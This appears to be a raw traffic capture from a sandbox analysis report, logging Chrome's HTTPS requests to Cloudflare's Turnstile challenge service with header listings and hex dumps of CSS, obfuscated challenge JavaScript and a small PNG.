                                        2024-12-17 14:45:55 UTC1369INData Raw: 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72
                                        Data Ascii: e-dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dar
                                        2024-12-17 14:45:55 UTC1369INData Raw: 32 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68
                                        Data Ascii: 20}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-h
                                        2024-12-17 14:45:55 UTC1369INData Raw: 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31
                                        Data Ascii: ;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1
                                        2024-12-17 14:45:55 UTC1369INData Raw: 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d
                                        Data Ascii: ay:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-com
                                        2024-12-17 14:45:55 UTC1369INData Raw: 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65
                                        Data Ascii: i{left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:fle
                                        2024-12-17 14:45:55 UTC1369INData Raw: 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                        Data Ascii: olor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        5192.168.2.1749708104.18.95.414433892C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2024-12-17 14:45:56 UTC727OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f37b31c6b081a48&lang=auto HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-platform: "Windows"
                                        Accept: */*
                                        Sec-Fetch-Site: same-origin
                                        Sec-Fetch-Mode: no-cors
                                        Sec-Fetch-Dest: script
                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/mwsoc/0x4AAAAAAA0AZ98IMQtWtTui/auto/fbE/normal/auto/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2024-12-17 14:45:57 UTC331INHTTP/1.1 200 OK
                                        Date: Tue, 17 Dec 2024 14:45:56 GMT
                                        Content-Type: application/javascript; charset=UTF-8
                                        Content-Length: 117330
                                        Connection: close
                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                        Server: cloudflare
                                        CF-RAY: 8f37b326ea89423b-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2024-12-17 14:45:57 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 53 79 57 4f 55 33 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63
                                        Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.SyWOU3={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fc
                                        2024-12-17 14:45:57 UTC1369INData Raw: 70 65 63 74 65 64 2e 25 32 30 43 68 65 63 6b 25 32 30 79 6f 75 72 25 32 30 49 6e 74 65 72 6e 65 74 25 32 30 63 6f 6e 6e 65 63 74 69 6f 6e 25 32 30 61 6e 64 25 32 30 25 33 43 61 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 72 65 66 72 65 73 68 5f 6c 69 6e 6b 25 32 32 25 33 45 72 65 66 72 65 73 68 25 32 30 74 68 65 25 32 30 70 61 67 65 25 33 43 25 32 46 61 25 33 45 25 32 30 69 66 25 32 30 74 68 65 25 32 30 69 73 73 75 65 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 74 65 73 74 69 6e 67 5f 6f 6e 6c 79 5f 61 6c 77 61 79 73 5f 70 61 73 73 22 3a 22 54 65 73 74 69 6e 67 25 32 30 6f 6e 6c 79 25 32 43 25 32 30 61 6c 77 61 79 73 25 32 30 70 61 73 73 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 65 78 70 69 72 65 64 22 3a 22 45 78 70 69 72 65 64 22 2c 22 6e 6f 74 5f 65 6d
                                        Data Ascii: pected.%20Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%20issue%20persists.","testing_only_always_pass":"Testing%20only%2C%20always%20pass.","turnstile_expired":"Expired","not_em
                                        2024-12-17 14:45:57 UTC1369INData Raw: 2c 67 35 2c 67 36 2c 67 77 2c 67 41 2c 67 42 2c 67 43 2c 67 47 2c 67 48 2c 67 33 2c 67 34 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 70 61 72 73 65 49 6e 74 28 67 49 28 38 36 31 29 29 2f 31 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 34 30 36 29 29 2f 32 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 37 31 33 29 29 2f 33 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 36 33 36 29 29 2f 34 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 34 34 37 29 29 2f 35 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 38 33 34 29 29 2f 36 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 38 31 32 29 29 2f 37 2a 28 2d 70 61 72 73 65 49 6e 74 28 67
                                        Data Ascii: ,g5,g6,gw,gA,gB,gC,gG,gH,g3,g4){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(861))/1*(parseInt(gI(406))/2)+-parseInt(gI(1713))/3*(parseInt(gI(636))/4)+parseInt(gI(1447))/5*(-parseInt(gI(834))/6)+parseInt(gI(1812))/7*(-parseInt(g
                                        2024-12-17 14:45:57 UTC1369INData Raw: 45 2c 46 29 7b 72 65 74 75 72 6e 20 45 2b 46 7d 2c 27 53 56 64 4b 4d 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 46 29 7b 72 65 74 75 72 6e 20 45 2b 46 7d 2c 27 6a 76 61 64 50 27 3a 67 4e 28 31 32 33 36 29 2c 27 58 68 67 4c 47 27 3a 67 4e 28 35 36 38 29 2c 27 51 6a 66 42 6b 27 3a 67 4e 28 31 31 39 31 29 7d 29 3b 74 72 79 7b 69 66 28 6a 3d 69 5b 67 4e 28 37 39 31 29 5d 28 65 4f 2c 66 5b 67 4e 28 31 34 35 34 29 5d 2c 66 5b 67 4e 28 35 36 37 29 5d 29 2c 69 5b 67 4e 28 31 38 30 38 29 5d 28 66 5b 67 4e 28 31 34 35 34 29 5d 2c 45 72 72 6f 72 29 3f 66 5b 67 4e 28 31 34 35 34 29 5d 3d 4a 53 4f 4e 5b 67 4e 28 39 31 31 29 5d 28 66 5b 67 4e 28 31 34 35 34 29 5d 2c 4f 62 6a 65 63 74 5b 67 4e 28 37 39 38 29 5d 28 66 5b 67 4e 28 31 34 35 34 29 5d 29 29 3a 66 5b 67 4e 28 31
                                        Data Ascii: E,F){return E+F},'SVdKM':function(E,F){return E+F},'jvadP':gN(1236),'XhgLG':gN(568),'QjfBk':gN(1191)});try{if(j=i[gN(791)](eO,f[gN(1454)],f[gN(567)]),i[gN(1808)](f[gN(1454)],Error)?f[gN(1454)]=JSON[gN(911)](f[gN(1454)],Object[gN(798)](f[gN(1454)])):f[gN(1
                                        2024-12-17 14:45:57 UTC1369INData Raw: 67 4f 28 31 33 39 36 29 5d 28 6d 29 2c 6e 26 26 28 67 5b 67 4f 28 31 30 32 36 29 5d 28 67 5b 67 4f 28 38 38 36 29 5d 2c 67 5b 67 4f 28 35 36 35 29 5d 29 3f 28 69 3d 6e 5b 31 5d 2c 6a 3d 70 61 72 73 65 49 6e 74 28 6e 5b 32 5d 2c 31 30 29 2c 6b 3d 70 61 72 73 65 49 6e 74 28 6e 5b 33 5d 2c 31 30 29 29 3a 28 67 5b 67 4f 28 31 36 37 35 29 5d 5b 67 4f 28 34 34 36 29 5d 28 29 2c 68 5b 67 4f 28 31 36 37 35 29 5d 5b 67 4f 28 31 30 31 38 29 5d 28 29 2c 69 5b 67 4f 28 31 36 37 35 29 5d 5b 67 4f 28 35 32 35 29 5d 28 29 2c 6a 5b 67 4f 28 34 36 38 29 5d 3d 21 21 5b 5d 29 29 29 3b 65 6c 73 65 20 69 66 28 67 4f 28 39 39 32 29 3d 3d 3d 67 4f 28 39 39 32 29 29 68 3d 4a 53 4f 4e 5b 67 4f 28 39 31 31 29 5d 28 65 29 3b 65 6c 73 65 20 72 65 74 75 72 6e 3b 72 65 74 75 72 6e 20
                                        Data Ascii: gO(1396)](m),n&&(g[gO(1026)](g[gO(886)],g[gO(565)])?(i=n[1],j=parseInt(n[2],10),k=parseInt(n[3],10)):(g[gO(1675)][gO(446)](),h[gO(1675)][gO(1018)](),i[gO(1675)][gO(525)](),j[gO(468)]=!![])));else if(gO(992)===gO(992))h=JSON[gO(911)](e);else return;return
                                        2024-12-17 14:45:57 UTC1369INData Raw: 29 5d 2c 68 48 28 31 31 32 33 29 29 3a 64 5b 68 48 28 31 35 34 30 29 5d 28 66 52 29 7d 2c 31 65 33 29 3a 65 26 26 65 5b 68 47 28 31 30 35 32 29 5d 3d 3d 3d 68 47 28 31 32 32 33 29 26 26 64 5b 68 47 28 38 31 38 29 5d 28 65 5b 68 47 28 38 35 31 29 5d 2c 68 47 28 39 38 36 29 29 26 26 64 5b 68 47 28 37 38 38 29 5d 28 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 2c 66 72 29 7d 29 2c 66 74 3d 21 5b 5d 2c 21 65 55 28 67 4a 28 31 33 34 34 29 29 26 26 28 66 52 28 29 2c 73 65 74 49 6e 74 65 72 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 69 6b 2c 63 2c 64 2c 65 29 7b 69 66 28 69 6b 3d 67 4a 2c 63 3d 7b 27 44 73 4d 4d 79 27 3a 66 75 6e 63 74 69 6f 6e 28 66 29 7b 72 65 74 75 72 6e 20 66 28 29 7d 2c 27 58 41 6c 7a 70 27 3a 69 6b 28 31 33 34 35 29 2c 27 5a 69 46 6f 76 27 3a 66 75
                                        Data Ascii: )],hH(1123)):d[hH(1540)](fR)},1e3):e&&e[hG(1052)]===hG(1223)&&d[hG(818)](e[hG(851)],hG(986))&&d[hG(788)](clearInterval,fr)}),ft=![],!eU(gJ(1344))&&(fR(),setInterval(function(ik,c,d,e){if(ik=gJ,c={'DsMMy':function(f){return f()},'XAlzp':ik(1345),'ZiFov':fu
                                        2024-12-17 14:45:57 UTC1369INData Raw: 2c 6d 29 7b 72 65 74 75 72 6e 20 6d 26 6c 7d 2c 27 45 4f 57 73 51 27 3a 6a 6d 28 36 36 38 29 2c 27 69 6a 73 53 6c 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 2d 6d 7d 2c 27 65 77 51 7a 79 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 2d 6d 7d 7d 2c 6b 2c 68 3d 33 32 2c 6a 3d 65 4d 5b 6a 6d 28 35 35 32 29 5d 5b 6a 6d 28 31 37 35 35 29 5d 2b 27 5f 27 2b 30 2c 6a 3d 6a 5b 6a 6d 28 37 37 39 29 5d 28 2f 2e 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 2c 6a 6e 29 7b 69 66 28 6a 6e 3d 6a 6d 2c 66 5b 6a 6e 28 31 36 30 34 29 5d 3d 3d 3d 6a 6e 28 35 32 33 29 29 7b 69 66 28 32 35 36 3e 61 77 5b 6a 6e 28 35 37 31 29 5d 28 30 29 29 7b 66 6f 72 28 62 48 3d 30 3b 66 5b 6a 6e 28 35 33 33 29 5d 28 62 49 2c 62 4a 29 3b
                                        Data Ascii: ,m){return m&l},'EOWsQ':jm(668),'ijsSl':function(l,m){return l-m},'ewQzy':function(l,m){return l-m}},k,h=32,j=eM[jm(552)][jm(1755)]+'_'+0,j=j[jm(779)](/./g,function(l,m,jn){if(jn=jm,f[jn(1604)]===jn(523)){if(256>aw[jn(571)](0)){for(bH=0;f[jn(533)](bI,bJ);
                                        2024-12-17 14:45:57 UTC1369INData Raw: 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 21 3d 3d 69 7d 2c 27 6f 52 68 54 68 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 43 4c 58 49 55 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 41 62 6a 72 57 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 7c 68 7d 2c 27 6b 6a 7a 42 4b 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 26 68 7d 2c 27 45 4e 44 79 6a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 77 44 72 6a 67 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 7c 68 7d 2c 27 61 6e 6e 6b 73 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75
                                        Data Ascii: tion(h,i){return h!==i},'oRhTh':function(h,i){return h<i},'CLXIU':function(h,i){return h==i},'AbjrW':function(h,i){return i|h},'kjzBK':function(h,i){return i&h},'ENDyj':function(h,i){return h-i},'wDrjg':function(h,i){return i|h},'annks':function(h,i){retu
                                        2024-12-17 14:45:57 UTC1369INData Raw: 2d 2d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 27 3a 44 3d 3d 30 26 26 28 44 3d 4d 61 74 68 5b 6a 43 28 37 32 36 29 5d 28 32 2c 46 29 2c 46 2b 2b 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 32 27 3a 43 3d 53 74 72 69 6e 67 28 4b 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 33 27 3a 78 5b 4c 5d 3d 45 2b 2b 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 34 27 3a 69 66 28 4f 62 6a 65 63 74 5b 6a 43 28 38 36 34 29 5d 5b 6a 43 28 34 37 39 29 5d 5b 6a 43 28 38 35 38 29 5d 28 42 2c 43 29 29 7b 69 66 28 64 5b 6a 43 28 31 35 30 33 29 5d 28 32 35 36 2c 43 5b 6a 43 28 35 37 31 29 5d 28 30 29 29 29 7b 66 6f 72 28 73 3d 30 3b 73 3c 46 3b 48 3c 3c 3d 31 2c 64 5b 6a 43 28 31 30 36 39 29 5d 28 49 2c 6a 2d 31 29 3f 28 49 3d 30 2c 47 5b 6a 43 28 31 32 37 37 29
                                        Data Ascii: --;continue;case'1':D==0&&(D=Math[jC(726)](2,F),F++);continue;case'2':C=String(K);continue;case'3':x[L]=E++;continue;case'4':if(Object[jC(864)][jC(479)][jC(858)](B,C)){if(d[jC(1503)](256,C[jC(571)](0))){for(s=0;s<F;H<<=1,d[jC(1069)](I,j-1)?(I=0,G[jC(1277)
                                        2024-12-17 14:45:57 UTC1369INData Raw: 5b 6a 43 28 31 34 35 33 29 5d 28 30 2c 44 29 26 26 28 44 3d 4d 61 74 68 5b 6a 43 28 37 32 36 29 5d 28 32 2c 46 29 2c 46 2b 2b 29 2c 64 65 6c 65 74 65 20 42 5b 43 5d 7d 65 6c 73 65 20 66 6f 72 28 4f 3d 78 5b 43 5d 2c 73 3d 30 3b 73 3c 46 3b 48 3d 48 3c 3c 31 2e 36 39 7c 31 26 4f 2c 64 5b 6a 43 28 31 34 39 36 29 5d 28 49 2c 64 5b 6a 43 28 31 34 33 34 29 5d 28 6a 2c 31 29 29 3f 28 49 3d 30 2c 47 5b 6a 43 28 31 32 37 37 29 5d 28 64 5b 6a 43 28 36 34 39 29 5d 28 6f 2c 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4f 3e 3e 3d 31 2c 73 2b 2b 29 3b 44 2d 2d 2c 30 3d 3d 44 26 26 46 2b 2b 7d 66 6f 72 28 4f 3d 32 2c 73 3d 30 3b 73 3c 46 3b 48 3d 48 3c 3c 31 2e 35 32 7c 64 5b 6a 43 28 31 36 30 30 29 5d 28 4f 2c 31 29 2c 49 3d 3d 6a 2d 31 3f 28 49 3d 30 2c 47 5b 6a 43 28 31
                                        Data Ascii: [jC(1453)](0,D)&&(D=Math[jC(726)](2,F),F++),delete B[C]}else for(O=x[C],s=0;s<F;H=H<<1.69|1&O,d[jC(1496)](I,d[jC(1434)](j,1))?(I=0,G[jC(1277)](d[jC(649)](o,H)),H=0):I++,O>>=1,s++);D--,0==D&&F++}for(O=2,s=0;s<F;H=H<<1.52|d[jC(1600)](O,1),I==j-1?(I=0,G[jC(1


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        6192.168.2.1749709104.18.95.414433892C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2024-12-17 14:45:57 UTC739OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-platform: "Windows"
                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                        Sec-Fetch-Site: same-origin
                                        Sec-Fetch-Mode: no-cors
                                        Sec-Fetch-Dest: image
                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/mwsoc/0x4AAAAAAA0AZ98IMQtWtTui/auto/fbE/normal/auto/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2024-12-17 14:45:57 UTC240INHTTP/1.1 200 OK
                                        Date: Tue, 17 Dec 2024 14:45:57 GMT
                                        Content-Type: image/png
                                        Content-Length: 61
                                        Connection: close
                                        cache-control: max-age=2629800, public
                                        Server: cloudflare
                                        CF-RAY: 8f37b32b98ab4307-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2024-12-17 14:45:57 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                        Data Ascii: PNGIHDRsIDAT$IENDB`


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        7192.168.2.1749713104.18.94.414433892C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2024-12-17 14:45:59 UTC433OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f37b31c6b081a48&lang=auto HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2024-12-17 14:45:59 UTC331INHTTP/1.1 200 OK
                                        Date: Tue, 17 Dec 2024 14:45:59 GMT
                                        Content-Type: application/javascript; charset=UTF-8
                                        Content-Length: 117270
                                        Connection: close
                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                        Server: cloudflare
                                        CF-RAY: 8f37b3376deb42db-EWR
                                        alt-svc: h3=":443"; ma=86400
